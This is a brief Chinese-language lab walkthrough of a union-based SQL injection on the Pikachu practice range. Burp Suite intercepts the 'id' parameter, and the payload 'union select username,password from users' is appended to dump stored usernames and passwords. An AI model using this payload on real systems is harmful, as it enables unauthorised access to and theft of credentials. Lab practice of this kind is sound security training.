用到piakchu靶场,burp抓包
进入靶场页面
通过提交查询得知由变量id来输出
然后进行抓包
找出输入的数字进行SQL语句拼接
id=1&submit=%E6%9F%A5%E8%AF%A2
union select username,password from users
id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2
拼接后进行提交,此时靶场页面显示出该数据库的名字和密码
SQL注入成功